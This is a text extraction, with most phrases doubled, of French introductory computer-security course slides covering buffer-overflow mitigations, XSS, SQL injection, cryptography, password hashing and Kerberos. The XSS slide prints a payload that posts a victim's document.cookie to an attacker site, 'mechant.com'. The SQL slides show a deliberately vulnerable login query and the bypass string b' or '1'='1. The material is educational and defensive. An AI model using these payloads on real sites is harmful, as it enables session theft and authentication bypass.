Page 39: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SolutionsSolutionsFormer les développeursFormer les développeursUtiliser des outils d’analyse du code sourceUtiliser des outils d’analyse du code source

Microsoft PrefastMicrosoft Prefast RATS (Rough Auditing Tool for Security)RATS (Rough Auditing Tool for Security)

Pour les problèmes de débordement de pilePour les problèmes de débordement de pile Rendre la pile non exécutable de manière logicielleRendre la pile non exécutable de manière logicielle

Linux openwallLinux openwallSolarisSolaris

ajout dans ajout dans /etc/system/etc/systemset noexec_user_stack=1set noexec_user_stack=1set noexec_user_stack_log=1set noexec_user_stack_log=1

Utiliser des compilateurs faisant appel à des canariesUtiliser des compilateurs faisant appel à des canariesStackGuard (dérivé de gcc)StackGuard (dérivé de gcc)Option /GS de Visual StudioOption /GS de Visual Studio

Rendre les pages de données non exécutables (cf fonctions Rendre les pages de données non exécutables (cf fonctions DEP NX/EPB des nouveaux processeurs)DEP NX/EPB des nouveaux processeurs)

Page 40: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cross Site Scripting Cross Site Scripting (XSS)(XSS)

Vulnérabilité très couranteVulnérabilité très couranteUne faille côté serveur sert à compromettre le Une faille côté serveur sert à compromettre le clientclientL’erreur consiste simplement à reproduire les L’erreur consiste simplement à reproduire les entrées utilisateur sans les valider !entrées utilisateur sans les valider !

Page 41: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

XSS en Action (Scénario)XSS en Action (Scénario)Les acteursLes acteurs

Barry, Barry, ‘‘Le Méchant’Le Méchant’

Marie, Marie, ‘‘L’innocente’L’innocente’

Le piègeLe piègeBarry veut voler le cookie de Marie pour le siteBarry veut voler le cookie de Marie pour le sitepleindetrous.compleindetrous.com..

Page 42: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

XSS en ActionXSS en Actionbienvenue.aspBonjour <%= request.querystring(‘name’)%>

Possède le site mechant.com

Page 43: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

XSS en Action XSS en Action

<a href=http://www.pleindetrous.com/bienvenue.asp?name= <FORM action=http://www.mechant.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> >here</a>

Page 44: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Injection SQLInjection SQL

if (isPasswordOK(Request.form("name"),Request.form("pwd"))) {if (isPasswordOK(Request.form("name"),Request.form("pwd"))) { Response.write("Authenticated!"); Response.write("Authenticated!"); // Do stuff // Do stuff } else { } else { Response.write("Access Denied"); Response.write("Access Denied"); }}

Page 45: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

function isPasswordOK(strName, strPwd) { function isPasswordOK(strName, strPwd) { var fAllowLogon = false; var fAllowLogon = false; var oConn = new ActiveXObject("ADODB.Connection"); var oConn = new ActiveXObject("ADODB.Connection"); var strConnection="Data Source=c:\\auth\\auth.mdb;" var strConnection="Data Source=c:\\auth\\auth.mdb;" oConn.Open(strConnection); oConn.Open(strConnection); var strSQL = "SELECT count(*) FROM client WHERE " + var strSQL = "SELECT count(*) FROM client WHERE " + "name='" + strName + "' " + "name='" + strName + "' " + " and pwd='" + strPwd + "'"; " and pwd='" + strPwd + "'"; var oRS = new ActiveXObject("ADODB.RecordSet"); var oRS = new ActiveXObject("ADODB.RecordSet"); oRS.Open(strSQL,oConn); oRS.Open(strSQL,oConn); fAllowLogon = (oRS(0).Value > 0) ? true : false; fAllowLogon = (oRS(0).Value > 0) ? true : false; oRS.Close(); oRS.Close(); delete oRS; delete oRS; oConn.Close(); oConn.Close(); delete oConn; delete oConn; return fAllowLogon; return fAllowLogon; }}

Injection SQLInjection SQL

Page 46: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

MéchantMéchantUsername: Username: b' or '1' = '1b' or '1' = '1Password: Password: b' or '1' = '1b' or '1' = '1

SELECT count(*) SELECT count(*) FROM client FROM client WHERE name='b' or '1'='1' and pwd='b' or '1'='1'WHERE name='b' or '1'='1' and pwd='b' or '1'='1'

Où est le problème ?Où est le problème ?GentilGentilUsername: Username: cyrilcyrilPassword: Password: &y-)&y-)4Hi=Qw84Hi=Qw8

SELECT count(*) SELECT count(*) FROM client FROM client WHERE name=‘cyril' and pwd='&y-)4Hi=Qw8'WHERE name=‘cyril' and pwd='&y-)4Hi=Qw8'

Page 47: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 1Module 1RappelsRappels

1B - Rappels sur la cryptologie 1B - Rappels sur la cryptologie

Page 48: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

CryptologieCryptologieLa science du secretLa science du secretDéfinitionsDéfinitions CryptographieCryptographie

Littéralement : art des écritures cachéesLittéralement : art des écritures cachéesChiffrement et déchiffrementChiffrement et déchiffrement

CryptanalyseCryptanalyseDécryptage sans connaissance de la cléDécryptage sans connaissance de la cléObjectif : déjouer les mécanismes mis en place Objectif : déjouer les mécanismes mis en place dans le cadre de la cryptographiedans le cadre de la cryptographie

Page 49: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

HistoireHistoireA été un enjeu de pouvoirA été un enjeu de pouvoir Usage contrôlé réservé à l’état (militaires, services de Usage contrôlé réservé à l’état (militaires, services de

renseignements, diplomates)renseignements, diplomates) La cryptographie a été libérée en France en 1999 La cryptographie a été libérée en France en 1999

(choix de protection des activités commerciales et de (choix de protection des activités commerciales et de la vie privée et reconnaissance que les activités la vie privée et reconnaissance que les activités malveillantes en tiraient déjà parti)malveillantes en tiraient déjà parti)

Quelques exemplesQuelques exemples Scytale spartiate (Scytale spartiate (

http://www.apprendre-en-ligne.net/crypto/transpo/scythttp://www.apprendre-en-ligne.net/crypto/transpo/scytale.htmlale.html))

Chiffre de CésarChiffre de César EnigmaEnigma ……

Page 50: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les 6 principes de KerckhoffsLes 6 principes de KerckhoffsLe 2Le 2èmeème est le plus connu :« Il faut qu’il n’exige est le plus connu :« Il faut qu’il n’exige pas le secret, et qu’il puisse sans inconvénient pas le secret, et qu’il puisse sans inconvénient tomber entre les mains de l’ennemi  »tomber entre les mains de l’ennemi  »

Journal des sciences militaires Journal des sciences militaires (janvier/février 1883)(janvier/février 1883)

Toute méthode de chiffrement est considérée Toute méthode de chiffrement est considérée comme publique et la sécurité du système ne comme publique et la sécurité du système ne dépend que du choix des clés dépend que du choix des clés Bien sûr la méthode n’a pas à être publique Bien sûr la méthode n’a pas à être publique mais doit être considérée comme telle quand on mais doit être considérée comme telle quand on l’évaluel’évalueSignifie que la sécurité NE s’obtient PAS que Signifie que la sécurité NE s’obtient PAS que par l’obscuritépar l’obscuritéhttp://www.petitcolas.net/fabien/kerckhoffs/index.htmlhttp://www.petitcolas.net/fabien/kerckhoffs/index.html

Page 51: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SondageSondageQu’est-ce qui est le plus fort (=difficile à Qu’est-ce qui est le plus fort (=difficile à casser) ?casser) ? AES 256AES 256 RSA 512RSA 512

Page 52: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

VocabulaireVocabulaireChiffrement : transformation d’un message Chiffrement : transformation d’un message intelligible (= intelligible (= message en clairmessage en clair) en message ) en message incompréhensible (incompréhensible (cryptogrammecryptogramme) à l’aide ) à l’aide d’un algorithme approprié et d’une clé de d’un algorithme approprié et d’une clé de chiffrementchiffrementLa transmission du message chiffré peut La transmission du message chiffré peut alors se faire par un support qui peut être alors se faire par un support qui peut être non sécurisénon sécuriséDéchiffrement : opération inverse au Déchiffrement : opération inverse au chiffrement à l’aide de la clé de chiffrement à l’aide de la clé de déchiffrement et de l’algorithme inverse à déchiffrement et de l’algorithme inverse à l’algorithme de chiffrement (nécessite que ce l’algorithme de chiffrement (nécessite que ce dernier soit réversible)dernier soit réversible)

Page 53: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Clé secrète partagée

Chiffrement par l'Utilisateur1

Algorithme Algorithme chiffrementchiffrement

Clé secrète partagée

Déchiffrement par l'Utilisateur2

Algorithme de Algorithme de déchiffrementdéchiffrement

Chiffrement symétriqueChiffrement symétriqueMême clé pour le chiffrement et le déchiffrement

Page 54: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cryptographie symétriqueCryptographie symétriqueAussi dite « à clé secrète (partagée) »Aussi dite « à clé secrète (partagée) »On chiffre et déchiffre avec la même cléOn chiffre et déchiffre avec la même cléEn principe le moteur est aussi symétriqueEn principe le moteur est aussi symétriqueLe chiffrement peut se faire par flux ou par Le chiffrement peut se faire par flux ou par bloc (CBC, ECB, CFB, OFB)bloc (CBC, ECB, CFB, OFB)

Page 55: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cryptographie symétriqueCryptographie symétriqueAvantagesAvantages Vitesse élevée de chiffrement / déchiffrementVitesse élevée de chiffrement / déchiffrement Longueur de clé variable pour plusieurs Longueur de clé variable pour plusieurs

algorithmesalgorithmes

InconvénientsInconvénients L’échange de manière sécurisée de la clé L’échange de manière sécurisée de la clé

partagée peut être difficilepartagée peut être difficile La gestion des clés peut être difficile La gestion des clés peut être difficile

Page 56: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cryptographie parfaiteCryptographie parfaiteInventée par Vernam en 1926Inventée par Vernam en 1926Chiffre à usage uniqueChiffre à usage unique - One time pad - One time pad (OTP)(OTP)La clé a la même longueur que le messageLa clé a la même longueur que le messageMessage chiffré = Message XOR CléMessage chiffré = Message XOR CléC=M K⊕C=M K⊕Utilisé par les espions et les téléphones Utilisé par les espions et les téléphones rougesrougesProblème : réutilisation de la cléProblème : réutilisation de la clé

Page 57: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Texte en clair Texte chiffré

Utilisateur1

Texte en clair

Utilisateur2Clé publique de l'Utilisateur2 Clé privée de l'Utilisateur2

Chiffrement asymétriqueChiffrement asymétrique

Page 58: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cryptographie asymétriqueCryptographie asymétriqueAussi dite « à clé publique / clé privée »Aussi dite « à clé publique / clé privée »Beaucoup plus récente que la cryptographie symétrique Beaucoup plus récente que la cryptographie symétrique (années 70). Les plus connus :(années 70). Les plus connus :

1976 : Diffie Hellman1976 : Diffie Hellman 1977 : RSA par 1977 : RSA par Rivest, Shamir et Adleman

Les 2 clés de la paire sont liées entre elles Les 2 clés de la paire sont liées entre elles mathématiquementmathématiquementCe qui est chiffré avec l’une ne peut être déchiffrée Ce qui est chiffré avec l’une ne peut être déchiffrée qu’avec l’autrequ’avec l’autreUne des clés est révélée à tout le monde et est dite Une des clés est révélée à tout le monde et est dite « publique », l’autre est secrète, dite « privée », et doit le « publique », l’autre est secrète, dite « privée », et doit le rester pour authentifier son possesseurrester pour authentifier son possesseurPropriété : connaissant la clé de chiffrement, il est Propriété : connaissant la clé de chiffrement, il est « impossible » de trouver dans un temps raisonnable la « impossible » de trouver dans un temps raisonnable la clé de déchiffrement (et réciproquement)clé de déchiffrement (et réciproquement)1000 fois plus lent que la chiffrement symétrique1000 fois plus lent que la chiffrement symétrique

Page 59: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Condensé (hash)Condensé (hash)

Texte en clair Condensé (sceau)

Fonction de résumé

Page 60: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Condensé (fonction de hachage)Condensé (fonction de hachage)Associe à toute suite de bits, un nombre de bits Associe à toute suite de bits, un nombre de bits prédéterminé via une fonction publique non prédéterminé via une fonction publique non inversible; « presque injective »inversible; « presque injective »Caractéristiques : Caractéristiques : Facilité de calcul : étant donné une suite de bits, il est Facilité de calcul : étant donné une suite de bits, il est

facile de calculer le condenséfacile de calculer le condensé Irréversible : étant donné le condensé, il est difficile Irréversible : étant donné le condensé, il est difficile

de calculer la suite de bitsde calculer la suite de bits Sans collisions : étant donné un suite de bits donnée, Sans collisions : étant donné un suite de bits donnée,

il est difficile de trouver une autre suite de bits il est difficile de trouver une autre suite de bits différente ayant le même condensé (donc la fonction différente ayant le même condensé (donc la fonction n’est pas injective mais s’en approche)n’est pas injective mais s’en approche)

Utilisé pour assurer l’intégrité de messages, de Utilisé pour assurer l’intégrité de messages, de fichiers, de données transmises, de programmesfichiers, de données transmises, de programmes

Page 61: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Algorithmes de hachage courantsAlgorithmes de hachage courantsMD4 (MD4 (Message Digest 4Message Digest 4)) 128 bits (16 octets), très rapide, approprié pour des 128 bits (16 octets), très rapide, approprié pour des

usages de sécurité moyensusages de sécurité moyens RFC 1320RFC 1320MD5 (MD5 (Message Digest 5Message Digest 5)) 128 bits (16 octets), rapide, plus sécurisé que MD4, 128 bits (16 octets), rapide, plus sécurisé que MD4,

très utilisétrès utilisé RFC 1321RFC 1321 Attention : collisions détectées en 2004Attention : collisions détectées en 2004SHA-1 (SHA-1 (Secure Hash AlgorithmSecure Hash Algorithm, standard du , standard du NIST)NIST) 160 bits (20 octets), plus lent que MD5160 bits (20 octets), plus lent que MD5 FIPS 180-1FIPS 180-1

Page 62: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

CondenséCondenséProblème : comment assurer l’authenticité Problème : comment assurer l’authenticité d’un condensé ?d’un condensé ? Le stocker dans un endroit protégéLe stocker dans un endroit protégé Le signerLe signer

Page 63: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Signature numériqueSignature numériquePour signer un document, on chiffre Pour signer un document, on chiffre seulement son hash (il n’est pas seulement son hash (il n’est pas nécessaire de chiffrer tout le document !), nécessaire de chiffrer tout le document !), avec sa clé privéeavec sa clé privéeAttention à la résistance aux collisions de Attention à la résistance aux collisions de la fonction de condensé pour garantir avec la fonction de condensé pour garantir avec un niveau de confiance élevé que c’est un niveau de confiance élevé que c’est bien ce document qui a été signébien ce document qui a été signé

Page 64: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Fonction Fonction de résuméde résumé

Utilisateur1 (émetteur)

Texte brut

Clé privée de l'Utilisateur1

Condensé

Condenséchiffré

11

22

33

Utilisateur2 (destinataire)

Clé publique de l'Utilisateur1

44

66 ComparaisonComparaison

55

Fonction Fonction de résuméde résumé

Signatures numériquesSignatures numériques

Page 65: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Confiance en la clé publiqueConfiance en la clé publiqueWeb of trustWeb of trust (PGP) (PGP)PKI PKI Notion de certificat numérique X509v3Notion de certificat numérique X509v3 Autorités de certification racinesAutorités de certification racines

Page 66: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2A - Contrôle d’accès2A - Contrôle d’accès

Page 67: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Contrôle d’accèsContrôle d’accèsLe contrôle d’accès est le modèle de mise Le contrôle d’accès est le modèle de mise en place d’autorisations (en place d’autorisations (ex : Cyril a ex : Cyril a besoin de permissions pour accéder à besoin de permissions pour accéder à cette ressourcecette ressource))Il est nécessaire pour permettreIl est nécessaire pour permettre Aux utilisateurs autorisés d’accéder aux Aux utilisateurs autorisés d’accéder aux

ressources dont ils ont besoinressources dont ils ont besoin D’empêcher les autres utilisateurs (non D’empêcher les autres utilisateurs (non

autorisés) d’accéder aux ressourcesautorisés) d’accéder aux ressources

Page 68: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Contrôle d’accèsContrôle d’accèsIl recouvre :Il recouvre : L’identification : l’entité indique qui elle est (= L’identification : l’entité indique qui elle est (=

son identité, son identité, ex : je suis Cyrilex : je suis Cyril)) L’authentification : vérification / validation de L’authentification : vérification / validation de

l’identité d’une entité (l’identité d’une entité (ex : l’utilisateur est bien ex : l’utilisateur est bien CyrilCyril))

L’autorisation : vérification / validation qu’une L’autorisation : vérification / validation qu’une entité a la permission d’accéder à une entité a la permission d’accéder à une ressource (ressource (ex : Cyril a la permission ex : Cyril a la permission d’accéder à cette ressourced’accéder à cette ressource))

Page 69: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

De l’authentification à l’autorisationDe l’authentification à l’autorisationAvant d’accorder des permissions ou des Avant d’accorder des permissions ou des privilèges, il est important de savoir à qui ou à privilèges, il est important de savoir à qui ou à quoi on compte les accorder. L’authentification quoi on compte les accorder. L’authentification précède donc l’autorisationprécède donc l’autorisationL’authentification la plus courante est celle des L’authentification la plus courante est celle des utilisateurs (on peut aussi authentifier un utilisateurs (on peut aussi authentifier un service, une machine)service, une machine)Il existe plusieurs méthodes pour authentifier Il existe plusieurs méthodes pour authentifier Le savoir (ex : mot de passe)Le savoir (ex : mot de passe) La possession (ex : jeton)La possession (ex : jeton) L’être (ex : biométrie)L’être (ex : biométrie) Le savoir faire (ex : signature manuscrite)Le savoir faire (ex : signature manuscrite)

Page 70: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

De l’authentification à l’autorisationDe l’authentification à l’autorisationPour des questions pratiques et de Pour des questions pratiques et de sécurité on utilise des systèmes sécurité on utilise des systèmes d’authentification centralisée (OS, d’authentification centralisée (OS, contrôleur de domaine, serveur contrôleur de domaine, serveur d’authentification)d’authentification)

Page 71: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AutorisationAutorisationBasée sur des critères d’accèsBasée sur des critères d’accès RôleRôle GroupeGroupe Emplacement physique ou logiqueEmplacement physique ou logique HeureHeure Type de transactionType de transactionPar défaut, dans un système sécurisé, l’accès Par défaut, dans un système sécurisé, l’accès devrait être refusé (si rien n’autorise devrait être refusé (si rien n’autorise explicitement l’accès alors il doit être explicitement l’accès alors il doit être implicitement refusé)implicitement refusé) Ex : pare-feuEx : pare-feuPrincipe du besoin de savoirPrincipe du besoin de savoir

Page 72: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mots de passeMots de passeMoyen le plus courant et aussi le plus Moyen le plus courant et aussi le plus faiblefaibleLes mots de passe ne sont JAMAIS Les mots de passe ne sont JAMAIS stockés en clairsstockés en clairsIls sont stockés sous forme de hash (la Ils sont stockés sous forme de hash (la fonction de hash est censée fournir si fonction de hash est censée fournir si possible un hash unique et irréversible)possible un hash unique et irréversible)Ensuite, lors de la saisie du mot de passe Ensuite, lors de la saisie du mot de passe on calcule le hash et on compare à celui on calcule le hash et on compare à celui que l’on a stockéque l’on a stocké

Page 73: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mots de passeMots de passeSous UnixSous Unix Le hash est obtenu en chiffrant avec DES56 une Le hash est obtenu en chiffrant avec DES56 une

chaîne vide (64 bits) avec comme clé le mot de passe chaîne vide (64 bits) avec comme clé le mot de passe puis en recommençant (25 fois en tout)puis en recommençant (25 fois en tout)

Attention : 8 caractères pris en compte maxiAttention : 8 caractères pris en compte maxi Un Un salt salt de 12 bits est utilisé pour que 2 mots de de 12 bits est utilisé pour que 2 mots de

passe identiques ne génèrent pas le même hashpasse identiques ne génèrent pas le même hash Autrefois stocké dans /etc/passwd (accès en lecture !)Autrefois stocké dans /etc/passwd (accès en lecture !) Maintenant dans /etc/shadow accessible uniquement Maintenant dans /etc/shadow accessible uniquement

par par rootroot (peut toujours être récupéré par accès (peut toujours être récupéré par accès physique au disque, comme dans tout système physique au disque, comme dans tout système d’exploitation)d’exploitation)

Page 74: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mots de passeMots de passe Sous Windows 9XSous Windows 9X LMHashLMHash

Le mot de passe ne peut pas excéder 14 Le mot de passe ne peut pas excéder 14 caractèrescaractèresIl est découpé en 2 blocs de 7 caractères, mis en Il est découpé en 2 blocs de 7 caractères, mis en majuscules (la casse ne compte pas!!)majuscules (la casse ne compte pas!!)Un demi-hash séparé est créé pour chaque bloc Un demi-hash séparé est créé pour chaque bloc (en utilisant les 7 caractères comme clé DES pour (en utilisant les 7 caractères comme clé DES pour chiffrer une chaîne constante)chiffrer une chaîne constante)Attention ; il n’y a pas de salt !Attention ; il n’y a pas de salt !Il existe des tables pour casser les LMHashes en Il existe des tables pour casser les LMHashes en quelques secondes (cf RainbowCrack de Philippe quelques secondes (cf RainbowCrack de Philippe Oechslin)Oechslin)

Page 75: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mots de passeMots de passeSous NT+Sous NT+ NTHashNTHash

MD4 (128 bits)MD4 (128 bits)Pas de salt !!Pas de salt !!

NTLM (NTLM (challenge/responsechallenge/response) : lors d’une ouverture de ) : lors d’une ouverture de session en domainesession en domaine

Le contrôleur envoie un message aléatoire au client Le contrôleur envoie un message aléatoire au client (challenge), (challenge), Le client chiffre le challenge avec le hash du mot de passe Le client chiffre le challenge avec le hash du mot de passe comme clé et envoie la réponse au contrôleurcomme clé et envoie la réponse au contrôleurLe contrôleur fait le même calcul et compare le résultatLe contrôleur fait le même calcul et compare le résultatAttention :Attention :

La réponse par défaut sur les anciens systèmes comporte une La réponse par défaut sur les anciens systèmes comporte une double réponse (NTHash et LMHash)double réponse (NTHash et LMHash)

Une attaque Une attaque Man-in-the-middle Man-in-the-middle est possibleest possible

Page 76: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mots de passeMots de passeStockage des Stockage des hasheshashes sous Windows sous Windows Soit dans la base locale (SAM), soit dans Soit dans la base locale (SAM), soit dans

Active Directory (ntds.dit)Active Directory (ntds.dit) Fichier chiffré (depuis W2K) avec SYSKEY Fichier chiffré (depuis W2K) avec SYSKEY

(clé potentiellement exportable en mode 2 et (clé potentiellement exportable en mode 2 et 3)3)

Déchiffrable par administrateur (cf pwdump3)Déchiffrable par administrateur (cf pwdump3)Si non chiffré, peut être volé par accès direct au Si non chiffré, peut être volé par accès direct au disque dur avec OS éteintdisque dur avec OS éteint

On peut désactiver les LMHashes : On peut désactiver les LMHashes : NoLMHashNoLMHash

Page 77: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cassage de mots de passeCassage de mots de passeÉvidence : il faut disposer des Évidence : il faut disposer des hasheshashes ou de quelque ou de quelque chose dérivé des mots de passe ou de leurs chose dérivé des mots de passe ou de leurs hasheshashes (hash de hash par ex.) sauf si on arrive à faire révéler le (hash de hash par ex.) sauf si on arrive à faire révéler le mot de passe directement par un utilisateur (ingénierie mot de passe directement par un utilisateur (ingénierie sociale)sociale)Ensuite, comme les Ensuite, comme les hasheshashes sont irréversibles, il existe sont irréversibles, il existe des outils pour recalculer les des outils pour recalculer les hasheshashes et vérifier qu’on a et vérifier qu’on a trouvé le bon mot de passetrouvé le bon mot de passe

DictionnaireDictionnaire Force bruteForce brute

Ici intervient l’importance de la force du hash mais aussi Ici intervient l’importance de la force du hash mais aussi et surtout la force du mot de passe choisi par l’utilisateuret surtout la force du mot de passe choisi par l’utilisateur

Politique de longueur et de complexité de mots de passe, Politique de longueur et de complexité de mots de passe, différence avec les mots de passe précédents, durée de vie, différence avec les mots de passe précédents, durée de vie, nombre de tentatives erronées…nombre de tentatives erronées…

Page 78: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Choix d’un bon mot de passeChoix d’un bon mot de passe

Eviter les attaques de dictionnaires et hybridesEviter les attaques de dictionnaires et hybrides Ne contient aucun nom ou motNe contient aucun nom ou mot Symboles/chiffres/accents aussi au débutSymboles/chiffres/accents aussi au début

15 caractères (si on n’a pas désactivé le 15 caractères (si on n’a pas désactivé le LMHash, sinon 10 caractères)LMHash, sinon 10 caractères)Position sur le clavier (attention aux espions)Position sur le clavier (attention aux espions) ex : « àçoex : « àço09O09O_èu_èu87U87U-(t »-(t »

Initiales d’une phrase, plus d&f0rm@tions non Initiales d’une phrase, plus d&f0rm@tions non trivialestriviales ex : « Tc:1j,jr&àNYat! »ex : « Tc:1j,jr&àNYat! »

Page 79: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

KerberosKerberosDans la mythologie grecques, nom du Dans la mythologie grecques, nom du chien à 3 têtes gardant l’entrée des enferschien à 3 têtes gardant l’entrée des enfersConçu dans les années 80 par le MITConçu dans les années 80 par le MITMoyen d’authentification dans des Moyen d’authentification dans des systèmes répartis (permet le single sign systèmes répartis (permet le single sign on entre différents environnements)on entre différents environnements)Introduit initialement sur Unix, apparu Introduit initialement sur Unix, apparu dans Windows depuis Windows 2000 dans Windows depuis Windows 2000 Server (remarque : par rapport à NTLM, Server (remarque : par rapport à NTLM, plus d’attaque plus d’attaque Man-in-the-middleMan-in-the-middle))

Page 80: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

KerberosKerberosLes principaux composantsLes principaux composants KDC (Key Distribution Center)KDC (Key Distribution Center)

Possède toutes les clés secrètesPossède toutes les clés secrètesIl propose le service d’authentificationIl propose le service d’authentificationLes clients et les services partent du principe que le KDC est Les clients et les services partent du principe que le KDC est intègreintègre

Principals Principals (entités tels que des utilisateurs, des (entités tels que des utilisateurs, des applications, des services)applications, des services)

Partage avec le KDC une clé secrète (symétrique)Partage avec le KDC une clé secrète (symétrique) Ticket Ticket

Généré par le KDC quand un principal a besoin de Généré par le KDC quand un principal a besoin de s’authentifier auprès d’un autre principals’authentifier auprès d’un autre principal

Realm Realm (royaume / domaine)(royaume / domaine)Ensemble logique de Ensemble logique de principalsprincipals

Page 81: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

KerberosKerberosServices fondamentauxServices fondamentaux Authentication Service Authentication Service (AS) : (AS) :

Authentifie un Authentifie un principalprincipalFournit les TGT (Fournit les TGT (Ticket Granting TicketsTicket Granting Tickets))

